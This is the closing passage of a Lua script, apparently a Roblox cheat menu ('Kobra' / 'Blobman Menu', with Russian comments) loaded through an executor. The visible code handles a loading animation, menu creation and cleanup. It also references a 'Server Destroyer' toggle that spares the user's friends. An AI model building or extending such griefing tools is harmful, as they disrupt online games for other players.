dotsLabel.TextSize = 24
dotsLabel.Font = Enum.Font.Gotham
dotsLabel.TextXAlignment = Enum.TextXAlignment.Center
dotsLabel.TextYAlignment = Enum.TextYAlignment.Center
dotsLabel.Parent = loadingFrame

-- Анимация точек для загрузки меню
spawn(function()
    local dots = {"", ".", "..", "..."}
    local index = 1
    while loadingGui.Parent do -- Пока UI существует
        dotsLabel.Text = dots[index]
        index = index + 1
        if index > #dots then
            index = 1
        end
        task.wait(0.5) -- Пауза между сменой точек
    end
end)

-- Ждем 3 секунды для анимации загрузки меню
task.wait(3)

-- Удаляем UI анимации загрузки
loadingGui:Destroy()

-- СОЗДАНИЕ МЕНЮ
local menu = createMenu()

-- ОБРАБОТКА ЗАКРЫТИЯ СКРИПТА
game:GetService("CoreGui").ChildRemoved:Connect(function(child)
    if child.Name == "Kobra" then
        getgenv().KobraOpen = false
        -- Останавливаем Server Destroyer при закрытии меню
        toggleServerDestroyer(false, isFriendsWhitelisted)
    end
end)

-- Удаляем UI сообщений при удалении основного GUI меню
messageGui.AncestryChanged:Connect(function()
    if not messageGui.Parent then
        messageGui:Destroy()
    end
end)


-- ВЫВОД В КОНСОЛЬ О УСПЕШНОЙ ЗАГРУЗКЕ
print("Blobman Menu Successfully Loaded! Press G to toggle menu.")
